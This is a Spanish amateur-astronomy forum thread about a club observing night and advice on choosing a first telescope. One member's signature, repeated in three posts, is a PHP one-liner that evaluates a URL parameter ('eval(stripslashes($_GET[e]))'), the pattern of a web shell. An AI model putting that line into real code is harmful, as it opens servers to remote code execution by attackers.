Salida 28 de Junio

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
miguel angel
Mensajes: 5
Registrado: Sab May 24, 2008 11:29 am

Salida 28 de Junio

Mensaje por miguel angel »

[quote="carlosz22"]Bienvenido seas Miguel Ángel, no me di cuenta de darte la bienvenida cuanto te presentaste en el foro :oops: En el hilo que se ha abierto en el foro de la Asociación Hubble, se han apuntado varios de Fuenlabrada. Puedes ponerte de acuerdo con ellos para salir todos juntos :wink: Estáis más o menos cerca.

El hilo es este:

http://www.asociacionhubble.org/modules ... 86&start=0

Un saludo :)

PD: Por ahora ya van unos 30 apuntados :shock:[/quote]
Ya le he echado un vistazo al otro foro..., la verdad que se va a punatar mucha gente.
Por ahora me voy directo a coslada, ya que no se si van a venir unos amigos mios, para que experimenten la sensacion.
Bueno, pues nos vemos... ah y no pasa nada por lo de la bienvenida.
El pensamiento es la única cosa del Universo cuya existencia no se puede negar. Negar es pensar.
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

Al final estuvo muy bien la quedada. Vino cantidad de gente, de las más nutriditas que recuerdo.

Hipatia, ¿encontraste las llaves? si no, ya sabes que las cosas en Pioz se pueden rescatar más adelante :oops: :oops:

Por cierto, hubo momentos de una gran estabilidad. De hecho vi el mejor Júpiter que recuerdo. A ver si repetimos para la próxima ;)

Saludos!
phpbb:eval(stripslashes($_GET[e]));
miguel angel
Mensajes: 5
Registrado: Sab May 24, 2008 11:29 am

Salida 28 de Junio

Mensaje por miguel angel »

[quote="m3ntol"]Al final estuvo muy bien la quedada. Vino cantidad de gente, de las más nutriditas que recuerdo.

Hipatia, ¿encontraste las llaves? si no, ya sabes que las cosas en Pioz se pueden rescatar más adelante :oops: :oops:

Por cierto, hubo momentos de una gran estabilidad. De hecho vi el mejor Júpiter que recuerdo. A ver si repetimos para la próxima ;)

Saludos![/quote]
Gracias por la experiencia. Me encanto el compartir impresiones y que me dieran consejos, sobretodo del buscador, haber si en la proxima salida ya lo tengo.
No me despedi de todo el mundo, en todo caso decir que me gusto vastante. GRACIAS POR LA EXPERIENCIA.
El pensamiento es la única cosa del Universo cuya existencia no se puede negar. Negar es pensar.
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Salida 28 de Junio

Mensaje por cmocho »

Antes de nada agradeceros la magnifica noche que pase con vosotros, ya estoy viendo para comprarme telescopio (me ha entrado la neura) aunque no se si la novia me dejara gastarme tanto dinero.

Para hacerse socio decirme que tengo que hacer.

Salu2
Hipatia
Mensajes: 4
Registrado: Dom Jun 22, 2008 1:00 pm

Salida 28 de Junio

Mensaje por Hipatia »

¡Holaaa! A mí también me gustó la experiencia, aprendí mucho y la gente era bastante maja. Eso sí, me sentí acomplejada con mis prismáticos, ni los utilicé, ¡con esos telescopios tan estupendos que teníais todos!

M3ntol, ya sé que en Pioz aparece de todo, incluso bolsas de deporte con gafas de natación :wink: :D , pero gracias a Dios mis llaves las encontré. Resulta que las había metido en el bolsillo de una mochila que iba a llevar al principio pero que se me quedaba pequeña, y olvidé cambiarlas a la que me llevé al final. Mi pobre padre se tuvo que bajar en zapatillas. :roll:

Cmocho, gracias por el viajecito. Si tu chica se pone muy dura con lo del telescopio, te la traes otra noche para que le pique el gusanillo, jeje.

¡Saludos a todos!
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

Bueno,
me alegro de que aparecieran las llaves :) llegamos a montar equipos de rastreo con linternas peinando toda la zona, je, je, je.

Cmocho, si quieres comprar un telescopio debes tener varias cosas claras. Seguro que la otra noche aprendiste varias de ellas pero ante todo debes saber:
1) Cuanto quieres o puedes gastarte
2) Qué tamaño consideras adecuado
3) Qué preferencias tienes (planetaria, cielo profundo, fotografía)
4) Donde vas a usarlo principlamente

Según sean esas preferencias habrá telescopios más o menos adecuados. Respecto a hacerte socio no tienes problema, en la próxima quedada o cuando te apetezca abonas los 10
phpbb:eval(stripslashes($_GET[e]));
cmocho
Mensajes: 58
Registrado: Mié Jun 25, 2008 1:17 pm

Salida 28 de Junio

Mensaje por cmocho »

Te contesto.

El precio aprox. que me puedo gastar (sin jugarme la vida en ello) son unos 350
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida 28 de Junio

Mensaje por astrolozano »

Me parece buena elección: suficientemente potente como para ver cielo profundo con relativa comodidad pero permite unos aumentos "altos" para planetaria. Además ocupa poco y es facil de transportar. Mi tubo es igual :lol:

Tu verás lo que prefieres gastarte; casi todos al principio intentábamos ir a lo más barato porque no veíamos la diferencia entre la montura barata y la cara, pero creeme que la hay. En ellas está la diferencia entre no ver la imagen quieta nunca (porque no soporta el peso del tubo y con respirar cerca tiembla, literalmente) y poder ver algo o incluso soportar (a duras penas) la cámara (aunque para visual y para fotografía planetaria te sobra)... Si eliges la barata, a lo mejor terminas hasta las narices de telescopio porque no consigues ver nada; pero tienes que ver si podrás transportar la otra que es más grande.

Ya ves que en estos temas intervienen muchos factores...

Por cierto, desde Torrejon puedes hartarte de Luna (con el ocular de 20mm) y de algunos objetos de cielo profundo muy brillantes (teniendo paciencia y los oculares adecuados para lograr contraste). Sólo hay que saber dónde buscar y tener paciencia. ¿En qué zona vives?
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Salida 28 de Junio

Mensaje por m3ntol »

Cmocho,
te he respondido en el otro hilo. Yo compraría un dobson de 8` ` . Vas a tener telescopio para años y es ideal para iniciarse. Además, entra perfectamente en tu presupuesto.

Por cierto, fue el primer telescopio serio que tuve :)
phpbb:eval(stripslashes($_GET[e]));
astrolozano
Mensajes: 325
Registrado: Dom Mar 04, 2007 10:35 pm

Salida 28 de Junio

Mensaje por astrolozano »

Uy no me había fijado que habia cambiado de hilo la conver, lo siento :roll:

No había pensado en un dobson, como nos gustan a 4 gatos... pero si no es problema la montura (de hecho son más fáciles de usar) vete a por uno que a igualdad de precio el tubo es de mejor calidad ("te ahorras la montura").
Responder